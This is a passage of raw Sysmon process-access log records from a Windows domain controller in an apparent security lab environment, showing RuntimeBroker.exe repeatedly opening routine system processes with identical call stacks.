13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dl